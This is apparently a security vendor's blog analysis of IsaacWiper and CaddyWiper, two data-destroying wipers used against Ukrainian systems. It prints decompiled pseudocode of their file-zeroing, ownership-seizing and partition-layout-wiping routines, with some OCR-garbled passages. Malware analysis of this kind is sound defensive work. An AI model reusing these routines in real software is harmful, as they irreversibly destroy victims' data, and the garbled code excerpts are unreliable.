# Double header: IsaacWiper and CaddyWiper

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As war in Ukraine rages, new destructive malware continues to be discovered. In this short blog post, we will review IsaacWiper and CaddyWiper, two new wipers that do not have much in common based on their source code, but with the same intent of destroying targeted Ukrainian computer systems.

#### **IsaacWiper**

IsaacWiper was one of the artifacts security company ESET reported to be targeting Ukraine. Other artifacts were named as HermeticWiper (wiper), HermeticWizard (spreader) and HermeticRansom (ransomware). IsaacWiper is far less advanced than HermeticWiper, the first wiper that was found which we analyzed <u>here</u>.

IsaacWiper is made of an executable, compiled with Visual Studio. The executable has imported functions like DeviceloControl, WriteFile, MoveFile, GetDiskFreeSpaceEx, FindNextFileW. Although these functions are legitimate, the combination of all these imports could be suspicious. Sections analysis, on other hand, is perfectly normal. No strange segments are found, and entropy has the expected values:

property	value	value	value	value
name	.text	.rdata	.data	.reloc
md5	06D63FDDF89FAE394876402	48F101DB632BB445C21A10F	5EFC98798D0979E69E2A667	9676F7C827FB9388358AABA
entropy	6.677	5.635	3.256	6.433
file-ratio (99.54%)	66.97 %	26.88 %	1.82 %	3.87 %
raw-address	0x00000400	0x00025000	0x00033C00	0x00034C00
raw-size (223744 bytes)	0x00024C00 (150528 bytes)	0x0000EC00 (60416 bytes)	0x00001000 (4096 bytes)	0x00002200 (8704 bytes)
virtual-address	0x10001000	0x10026000	0x10035000	0x10037000
virtual-size (226322 bytes)	0x00024B6C (150380 bytes)	0x0000EBAA (60330 bytes)	0x00001C5C (7260 bytes)	0x000020A0 (8352 bytes)
entry-point	0x00009CD4	-	•	-
characteristics	0x60000020	0x40000040	0xC0000040	0x42000040
writable	-	-	x	-
executable	x	-	-	-
shareable	-	-	•	-

The sample is presented in DLL form with just one export, named <u>Start@4</u> that contains the main functionality of the malware:

; Expo	rted entry 1Start@4
	(call Start(v)
jSU	
Ctont	
_start	94 proc near
call	main_in_export
push	0 ; dwReaso
push	2 ; uFlags
call	ds:ExitWindowsEx
xor	eax, eax
retn	4

The malware will iterate through all system disks, overwriting the first bytes of these disks:

File Read	process: path:	rundll32.exe	op: ive0	OpenRead	status:	0x00000000
File Write	process: path:	rundll32.exe	op: ive0	OpenModify	status:	0x00000000

The following chunk shows an extract of the code responsible for that behavior. Also, it can be seen how the volume is unlocked after write operations:

```
if ( nNumberOfBytesToWrite )
{
    sub_100031C0(nNumberOfBytesToWrite);
    WriteFile(FileW, Buffer, nNumberOfBytesToWrite, &NumberOfBytesWritten, 0);
    v5 += NumberOfBytesWritten;
}
LABEL_18:
    if ( v26 )
        DeviceIoControl(FileW, FSCTL_UNLOCK_VOLUME, 0, 0, 0, 0, &BytesReturned, 0);
CloseHandle(FileW);
return v5;
```

We have found that not only the physicalDrive but also partitions are wiped in the process. The wiper will iterate through the filesystem, enumerating files and overwriting them. This behavior is similar to ransomware activity, but in this case there is no decryption key. Once the data has been overwritten, it is lost:

File Write	process:	rundll32.exe	op:	OpenModify	status:	0xC000034
	path:	C:\Program File	es∖Windows	Sidebar\Gadge	ets\SlideS	how.Gadget\it-IT\Tmf4AA7.tmp
File Read	process:	rundll32.exe	op:	Unknown	status:	0x0000000
	path:	C:\Program File	es∖Windows	Sidebar\Gadge	ets\SlideS	how.Gadget\ja-JP\
File Read	process:	rundll32.exe	op:	Unknown	status:	0x0000000
	path:	C:\Program File	es\Windows	Sidebar\Gadge	ets\SlideS	how.Gadget\ja-JP\css\
File Write	process:	rundll32.exe	op:	OpenModify	status:	0xC0000022
	path:	C:\Program File	es\Windows	Sidebar\Gadge	ets\SlideS	how.Gadget\ja-JP\css\settings.css
File Read	process:	rundll32.exe	op:	OpenRead	status:	0xC0000022
	path:	C:\Program File	es∖Windows	Sidebar\Gadge	ets\SlideS	how.Gadget\ja-JP\css\settings.css
File Write	process:	rundll32.exe	op:	OpenModify	status:	0xC000034
	path:	C:\Program File	es\Windows	Sidebar\Gadge	ets\SlideS	how.Gadget\ja-JP\css\Tmf4AA7.tmp
File Write	process:	rundll32.exe	op:	OpenModify	status:	0xC0000022
	path:	C:\Program File	es\Windows	Sidebar\Gadge	ets\SlideS	how.Gadget\ja-JP\css\slideShow.css

The attackers left in the code various log strings. An example of one of these debug strings, being referenced inline is presented below:

🖬 🚅 🖼						
mov	edx, offset aStartErasingPh	;	"start	erasing	physical	drives"
lea	<pre>ecx, [esp+2B50h+logFile]</pre>					
call	log					
push	eax					
call	sub_100071D0					
add	esp, 4					
push	eax					
call	sub_100071D0					
mov	eax, [esp+2B54h+var_18]					
add	esp, 4					
mov	<pre>ecx, [esp+2B50h+var_1EB8]</pre>					
mov	edx, [esp+2B50h+var_1F28]					

In fact, these debug strings describe pretty well the malware functionality. All debug strings are presented below:

C:\ProgramData\log.txt
getting drives
physical drives:
system physical drive
physical drive
logical drives:
system logical drive:
logical drive:
start erasing physical drives
FAILED
physical drive
start erasing logical drive
start erasing system physical drive
system physical drive FAILED
start erasing system logical drive

As it can be seen, the attackers' goal is destroying data on victims systems. Affected users will lose their files, and their computers will be unbootable, forcing them to reinstall the OS.

## CaddyWiper

CaddyWiper is a 3rd Wipper (after HermeticWiper and IzaakWiper) that was observed in this year's attack on Ukraine. In contrast to HermeticWiper, this one is very small, and has less complex capabilities.

The sample is not signed and its compilation date is: 14 March 2022 07:19:36 UTC. The executable is dedicated to destroying files and partition information for each available disk.

The main function of the wiper can be seen below:

```
int start()
 int result; // eax
 unsigned int i; // [esp+0h] [ebp-68h]
 char netapi32_dll[16]; // [esp+4h] [ebp-64h] BYREF
 char v3[12]; // [esp+14h] [ebp-54h] BYREF
 char v4[16]; // [esp+20h] [ebp-48h] BYREF
 DSROLE PRIMARY DOMAIN INFO BASIC *Buffer; // [esp+30h] [ebp-38h] BYREF
 void (__stdcall *LoadLibraryA)(char *); // [esp+34h] [ebp-34h]
 char v7[16]; // [esp+38h] [ebp-30h] BYREF
 char d_dir[4]; // [esp+48h] [ebp-20h] BYREF
 WCHAR kernel32 dll[13]; // [esp+4Ch] [ebp-1Ch] BYREF
 kernel32_dll[0] = 'k';
kernel32_dll[1] = 'e';
kernel32_dll[2] = 'r';
kernel32_dll[3] = 'n';
kernel32_dll[4] = 'e';
kernel32_dll[5] = '1';
kernel32 dll[6] = '3';
 kernel32_dll[7] = '2';
 kernel32_dll[8] = '.';
 kernel32 dl1[9] = 'd';
kernel32_dll[10] = '1';
kernel32_dll[11] = 'l';
 kernel32_dll[12] = 0;
 strcpy(v4, "advapi32.dll");
strcpy(v7, "LoadLibraryA");
 LoadLibraryA = retrieve_api_func(kernel32_dll, v7);
 strcpy(netapi32_dll, "netapi32.dll");
 LoadLibraryA(netapi32_dll);
 Buffer = 0;
 result = DsRoleGetPrimaryDomainInformation(0, DsRolePrimaryDomainInfoBasic, &Buffer);
 if ( Buffer->MachineRole != DsRole_RolePrimaryDomainController )
   LoadLibraryA(v4);
   strcpy(v3, "C:\\Users");
   wipe_files_in_dir(v3);
    strcpy(d_dir, "D:\\");
    for ( i = 0; i < 24; ++i )
      wipe_files_in_dir(d_dir);
      ++d_dir[0];
    return wipe partition info();
  return result;
```

First, the wiper checks if it is running on the Primary Domain Controller. The malware will avoid trashing Domain Controllers, probably because it wants to keep them alive for the purpose of propagation.

If the current machine is not a Domain Controller, the wiping starts. It recursively wipes files in the C:\Users directory. Then, it iterates over available hard disks, starting from "D:" and wipes recursively all the files it can access.

The wiping is done in the following way:

```
first_file = FindFirstFileA(v23, &file_data);
v13 = first_file;
if ( first_file != -1 )
     if ( (file data.dwFileAttributes & 0x10) != 0 )// FILE ATTRIBUTE DIRECTORY
       if ( (file_data.cFileName[0] != '.' || file_data.cFileName[1] && file_data.cFileName[1] != '.')
   && (file_data.dwFileAttributes & 2) == 0
   && (file_data.dwFileAttributes & 4) == 0 )
         append_string(v18, dir_name, v9);
         append_string(file_name, v18, file_data.cFileName);
         grant_permission(file_name);
         wipe_files_in_dir(file_name);
       append_string(v18, dir_name, v9);
       append_string(file_name, v18, file_data.cFileName);
       if ( grant_permission(file_name) )
         hFile = CreateFileA(file name, 0xC0000000, 3, 0, 3, 128, 0);
         if (hFile != -1)
           max_size = GetFileSize(hFile, 0);
            if ( max_size > 0xA00000 )
             max_size = 0xA00000;
           null_buf = LocalAlloc(LMEM_ZEROINIT, max_size);
           clear_buffer(null_buf, max_size);
SetFilePointer(hFile, 0, 0, 0);
WriteFile(hFile, null_buf, max_size, &v3, 0);
           LocalFree(null_buf);
           CloseHandle(hFile);
  while ( FindNextFileA(v13, &file_data) );
  return FindClose(v13);
```

```
It tries to grant access to the files before writing:
```

```
( AllocateAndInitializeSid(&sid_id1, 1, 0, 0, 0, 0, 0, 0, 0, 0, &sid1) )
if ( AllocateAndInitializeSid(&sid_id2, 2, 32, 544, 0, 0, 0, 0, 0, 0, &sid2) )
  clear_buffer(listOfExplicitEntries, 64);
  listOfExplicitEntries[0].grfAccessPermissions = 0x80000000;// GENERIC_READ
listOfExplicitEntries[0].grfAccessMode = SET_ACCESS;
 listofExplicitEntries[0].grfInheritance = 0;
listofExplicitEntries[0].Trustee.TrusteeForm = TRUSTEE_IS_SID;
listofExplicitEntries[0].Trustee.TrusteeType = TRUSTEE_IS_WELL_KNOWN_GROUP;
listofExplicitEntries[0].Trustee.ptstrName = sid1;
  listOfExplicitEntries[1].grfAccessPermissions = 0x10000000;// GENERIC_ALL
  listOfExplicitEntries[1].grfAccessMode = SET_ACCESS;
  listOfExplicitEntries[1].grfInheritance = 0;
listOfExplicitEntries[1].Trustee.TrusteeForm = TRUSTEE_IS_SID;
  listOfExplicitEntries[1].Trustee.TrusteeType = TRUSTEE_IS_GROUP;
listOfExplicitEntries[1].Trustee.ptstrName = sid2;
  if ( !SetEntriesInAclA(2, listOfExplicitEntries, 0, &new_acl) )
    status = SetNamedSecurityInfoA(pObjectName, SE_FILE_OBJECT, 4, 0, 0, *&new_acl.AclRevision, 0);
          if ( OpenProcessToken(v1) )
             strcpy(str_SeTakeOwnershipPrivilege, "SeTakeOwnershipPrivilege");// Take ownership of files or other objects
if ( enable_disable_privilege(token_hndl, str_SeTakeOwnershipPrivilege, 1) )// enable
                if ( !status )
                  if ( enable_disable_privilege(token_hndl, str_SeTakeOwnershipPrivilege, 0) )// disable
                     status = SetNamedSecurityInfoA(pObjectName, SE_FILE_OBJECT, 4, 0, 0, *&new_acl.AclRevision, 0);
```

All the files/directories are enumerated by well-known APIs:

**FindFirstFileA** / **FindNextFileA**. If the found element is a directory, the function is called recursively. And if it is a file, a new buffer filled with 0s is allocated, and the file content is overwritten with it. The buffer is limited to 10 Mb max, so if the file is bigger than this, only the beginning of it will be wiped.

Interestingly, this enumeration starts from the drive letter **D** (treating **C** as a separate case), so if there are any disks mounted as **A** or **B**, they are skipped. Finally the malware wipes layout information of the available disks/partitions:

```
parition_count = 9;
 ret_buf = 0;
 physicalDriveHndl = -1;
clear_buffer(null_buf, 1920);
clear_buffer(null_buf, 1920);
strcpy(disk_path, "\\");
strcpy(&disk_path[2], "\\");
strcpy(&disk_path[4], ".");
strcpy(&disk_path[6], "\\");
strcpy(&disk_path[8], "P");
strcpy(&disk_path[10], "H");
strcpy(&disk_path[12], "Y");
                                "S");
strcpy(&disk_path[14],
 strcpy(&disk_path[16],
 strcpy(&disk_path[18],
strcpy(&disk_path[20],
strcpy(&disk_path[22],
strcpy(&disk_path[24],
                                    •);
 strcpy(&disk_path[26],
strcpy(&disk_path[28],
                                "V");
strcpy(&disk_path[30],
strcpy(&disk_path[32],
strcpy(&disk_path[34], "9"
disk_path[36] = 0;
disk_path[37] = 0;
                                    •);
    physicalDriveHndl = CreateFileW(disk_path, 0xC0000000, 3, 0, 3, 128, 0);
   if ( physicalDriveHndl != -1 )
      DeviceIoControl(physicalDriveHndl, IOCTL_DISK_SET_DRIVE_LAYOUT_EX, null_buf, 0x780, 0, 0, &ret_buf, 0);
      CloseHandle(physicalDriveHndl);
    --disk_path[34];
    result = parition count--;
  return result;
```

It starts from the <u>\\.\PHYSICALDRIVE9</u>, and at each iteration decrements the partition number by one.

The wiping of the partition layout is implemented via IOCTL sent to the drive device: **IOCTL\_DISK\_SET\_DRIVE\_LAYOUT\_EX**. The malware sets an empty buffer as the new layout.

The sample is very mildly obfuscated and most of the used strings are stack-based. Also the Import Table is very small, containing only one function. All the needed functions are dynamically retrieved, with the help of a custom lookup routine:

```
v34[4] = 0;
62 v34[5] = 0;
63 FindFirstFileA = retrieve_api_func(dll_name, v26);
64 strcpy(v20, "FindNextFileA");
65 FindNextFileA = retrieve_api_func(dll_name, v20);
66 CreateFileA = 0;
67 strcpy(v10, "CreateFileA");
68 CreateFileA = retrieve_api_func(dll_name, v10);
69 GetFileSize = 0;
70 strcpy(v15, "GetFileSize");
71 GetFileSize = retrieve_api_func(dll_name, v15);
    strcpy(v27, "LocalAlloc");
73 LocalAlloc = retrieve_api_func(dll_name, v27);
74 SetFilePointer = 0;
75 strcpy(v24, "SetFilePointer");
76 SetFilePointer = retrieve_api_func(dll_name, v24);
77 WriteFile = 0;
78 strcpy(v36, "WriteFile");
79 WriteFile = retrieve_api_func(dll_name, v36);
80 LocalFree = 0;
81 strcpy(v25, "LocalFree");
82 LocalFree = retrieve_api_func(dll_name, v25);
83 CloseHandle = 0;
84 strcpy(v12, "CloseHandle");
85 CloseHandle = retrieve_api_func(dll_name, v12);
86 strcpy(v37, "FindClose");
87 FindClose = retrieve_api_func(dll_name, v37);
    first_file = FindFirstFileA(v23, &v17);
```

CaddyWiper is extremely light in comparison to HermeticWiper, which was the most complex from all the wipers that have been associated with those attacks. There is no code overlap between each of them, and most likely they have been written by different authors.

## Protection

Malwarebytes clients are protected against both of these wipers:

### Malwarebytes | Premium



## References

- 1. <u>https://www.welivesecurity.com/2022/03/01/isaacwiper-hermeticwizard-wiper-worm-targeting-ukraine/</u>
- 2. <u>https://www.eset.com/int/about/newsroom/press-releases/research/eset-research-ukraine-hit-by-destructive-attacks-before-and-during-the-russian-invasion-with-hermet/</u>

## **Indicators of Compromise**

#### **IsaacWiper**

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#### CaddyWiper